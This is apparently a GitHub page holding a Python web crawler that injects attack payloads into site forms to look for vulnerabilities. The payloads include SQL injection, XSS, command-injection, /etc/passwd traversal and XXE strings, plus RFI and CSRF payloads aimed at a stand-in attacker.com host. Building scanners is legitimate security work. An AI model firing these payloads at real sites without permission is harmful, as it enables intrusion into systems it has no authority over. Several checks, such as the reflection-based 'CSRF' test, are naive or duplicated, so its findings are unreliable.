-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathweb_crawler_vulnerability_scanner.py
255 lines (226 loc) · 11.4 KB
/
web_crawler_vulnerability_scanner.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
"""
Web Crawler and Vulnerability Scanner
Author: Rohit Ajariwal
License: MIT License
This tool crawls a website and scans for common web application vulnerabilities.
"""
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin, urlparse
import threading
import logging
import re
import hashlib
# Setup logging
logging.basicConfig(filename='vulnerability_scanner.log', level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s')
class WebCrawler:
def __init__(self, base_url):
self.base_url = base_url
self.visited_urls = set()
self.urls_to_visit = [base_url]
self.headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'}
self.lock = threading.Lock()
def crawl(self):
threads = []
for _ in range(10): # Adjust the number of threads as needed
thread = threading.Thread(target=self.worker)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
def worker(self):
while self.urls_to_visit:
with self.lock:
if self.urls_to_visit:
url = self.urls_to_visit.pop(0)
if url and url not in self.visited_urls:
self.visit_url(url)
def visit_url(self, url):
self.visited_urls.add(url)
try:
response = requests.get(url, headers=self.headers)
if response.status_code == 200:
response.encoding = response.apparent_encoding
soup = BeautifulSoup(response.text, 'html.parser')
self.extract_links(soup, url)
self.scan_forms(soup, url)
except requests.RequestException as e:
logging.error(f"Failed to fetch {url}: {e}")
def extract_links(self, soup, current_url):
for link in soup.find_all('a', href=True):
href = link['href']
if not href.startswith('http'):
href = urljoin(current_url, href)
parsed_href = urlparse(href)
if parsed_href.netloc == urlparse(self.base_url).netloc:
with self.lock:
if href not in self.visited_urls:
self.urls_to_visit.append(href)
def scan_forms(self, soup, url):
forms = soup.find_all('form')
for form in forms:
form_details = self.get_form_details(form)
self.test_vulnerabilities(form_details, url)
def get_form_details(self, form):
details = {}
try:
action = form.attrs.get('action')
method = form.attrs.get('method', 'get').lower()
inputs = []
for input_tag in form.find_all('input'):
input_type = input_tag.attrs.get('type', 'text')
input_name = input_tag.attrs.get('name')
inputs.append({'type': input_type, 'name': input_name})
details['action'] = action
details['method'] = method
details['inputs'] = inputs
except Exception as e:
logging.error(f"Error getting form details: {e}")
return details
def send_request(self, form_details, url, payload):
data = {}
for input in form_details['inputs']:
if input['type'] == 'text' or input['type'] == 'search':
data[input['name']] = payload
else:
data[input['name']] = 'test'
if form_details['method'] == 'post':
return requests.post(urljoin(url, form_details['action']), data=data, headers=self.headers)
else:
return requests.get(urljoin(url, form_details['action']), params=data, headers=self.headers)
def test_vulnerabilities(self, form_details, url):
self.test_sql_injection(form_details, url)
self.test_xss(form_details, url)
self.test_command_injection(form_details, url)
self.test_file_inclusion(form_details, url)
self.test_directory_traversal(form_details, url)
self.test_html_injection(form_details, url)
self.test_csrf(form_details, url)
self.test_lfi(form_details, url)
self.test_rfi(form_details, url)
self.test_ldap_injection(form_details, url)
self.test_xxe(form_details, url)
self.test_ssrf(form_details, url)
self.test_unvalidated_redirects(form_details, url)
self.test_clickjacking(url)
def test_sql_injection(self, form_details, url):
sql_payloads = ["' OR '1'='1", "' OR '1'='1' --", "' OR '1'='1' /*", "' OR '1'='1' {0}", "' OR '1'='1' AND '1'='1"]
error_patterns = ["you have an error in your sql syntax", "warning: mysql", "unclosed quotation mark after the character string", "quoted string not properly terminated"]
for payload in sql_payloads:
response = self.send_request(form_details, url, payload)
for pattern in error_patterns:
if re.search(pattern, response.text, re.IGNORECASE):
logging.info(f"SQL Injection vulnerability found at {url}")
print(f"SQL Injection vulnerability found at {url}")
break
def test_xss(self, form_details, url):
xss_payloads = ["<script>alert('XSS')</script>", "<img src='x' onerror='alert(1)'>", "<svg onload=alert('XSS')>", "<body onload=alert('XSS')>", "<iframe src=javascript:alert('XSS')>"]
for payload in xss_payloads:
response = self.send_request(form_details, url, payload)
if payload in response.text:
logging.info(f"XSS vulnerability found at {url}")
print(f"XSS vulnerability found at {url}")
break
def test_command_injection(self, form_details, url):
cmd_payloads = ["|| ping -c 1 127.0.0.1 ||", "; ping -c 1 127.0.0.1", "& ping -c 1 127.0.0.1", "&& ping -c 1 127.0.0.1", "| ping -c 1 127.0.0.1 |"]
for payload in cmd_payloads:
response = self.send_request(form_details, url, payload)
if "PING" in response.text:
logging.info(f"Command Injection vulnerability found at {url}")
print(f"Command Injection vulnerability found at {url}")
break
def test_file_inclusion(self, form_details, url):
lfi_payloads = ["../../../../etc/passwd", "..\\..\\..\\..\\etc\\passwd"]
for payload in lfi_payloads:
response = self.send_request(form_details, url, payload)
if "root:" in response.text:
logging.info(f"Local File Inclusion vulnerability found at {url}")
print(f"Local File Inclusion vulnerability found at {url}")
break
def test_directory_traversal(self, form_details, url):
dt_payloads = ["../../../../etc/passwd", "..\\..\\..\\..\\etc\\passwd"]
for payload in dt_payloads:
response = self.send_request(form_details, url, payload)
if "root:" in response.text:
logging.info(f"Directory Traversal vulnerability found at {url}")
print(f"Directory Traversal vulnerability found at {url}")
break
def test_html_injection(self, form_details, url):
html_payloads = ["<b>Injected HTML</b>", "<iframe src='javascript:alert(1)'></iframe>"]
for payload in html_payloads:
response = self.send_request(form_details, url, payload)
if payload in response.text:
logging.info(f"HTML Injection vulnerability found at {url}")
print(f"HTML Injection vulnerability found at {url}")
break
def test_csrf(self, form_details, url):
csrf_payloads = ["<img src='http://attacker.com/csrf' />", "<iframe src='http://attacker.com/csrf'></iframe>"]
for payload in csrf_payloads:
response = self.send_request(form_details, url, payload)
if payload in response.text:
logging.info(f"CSRF vulnerability found at {url}")
print(f"CSRF vulnerability found at {url}")
break
def test_lfi(self, form_details, url):
lfi_payloads = ["../../../../etc/passwd", "..\\..\\..\\..\\etc\\passwd"]
for payload in lfi_payloads:
response = self.send_request(form_details, url, payload)
if "root:" in response.text:
logging.info(f"Local File Inclusion vulnerability found at {url}")
print(f"Local File Inclusion vulnerability found at {url}")
break
def test_rfi(self, form_details, url):
rfi_payloads = ["http://attacker.com/malicious.php", "http://attacker.com/malicious.txt"]
for payload in rfi_payloads:
response = self.send_request(form_details, url, payload)
if "malicious" in response.text:
logging.info(f"Remote File Inclusion vulnerability found at {url}")
print(f"Remote File Inclusion vulnerability found at {url}")
break
def test_ldap_injection(self, form_details, url):
ldap_payloads = ["*)(uid=*))(|(uid=*", "*)(|(cn=*))", "*)(&(objectClass=*))", "*(|(objectClass=*))"]
for payload in ldap_payloads:
response = self.send_request(form_details, url, payload)
if "ldap" in response.text:
logging.info(f"LDAP Injection vulnerability found at {url}")
print(f"LDAP Injection vulnerability found at {url}")
break
def test_xxe(self, form_details, url):
xxe_payloads = ["<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]><foo>&xxe;</foo>", "<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///c:/windows/win.ini\"> ]><foo>&xxe;</foo>"]
for payload in xxe_payloads:
response = self.send_request(form_details, url, payload)
if "root:" in response.text:
logging.info(f"XXE vulnerability found at {url}")
print(f"XXE vulnerability found at {url}")
break
def test_ssrf(self, form_details, url):
ssrf_payloads = ["http://127.0.0.1:80", "http://localhost:80"]
for payload in ssrf_payloads:
response = self.send_request(form_details, url, payload)
if "localhost" in response.text:
logging.info(f"SSRF vulnerability found at {url}")
print(f"SSRF vulnerability found at {url}")
break
def test_unvalidated_redirects(self, form_details, url):
ur_payloads = ["http://evil.com", "http://phishing.com"]
for payload in ur_payloads:
response = self.send_request(form_details, url, payload)
if payload in response.text:
logging.info(f"Unvalidated Redirects vulnerability found at {url}")
print(f"Unvalidated Redirects vulnerability found at {url}")
break
def test_clickjacking(self, url):
try:
response = requests.get(url, headers=self.headers)
if 'X-Frame-Options' not in response.headers:
logging.info(f"Clickjacking vulnerability found at {url}")
print(f"Clickjacking vulnerability found at {url}")
except requests.RequestException as e:
logging.error(f"Failed to fetch {url}: {e}")
# Example usage
if __name__ == "__main__":
base_url = 'https://example.com'
crawler = WebCrawler(base_url)
crawler.crawl()
print(f"Visited URLs: {crawler.visited_urls}")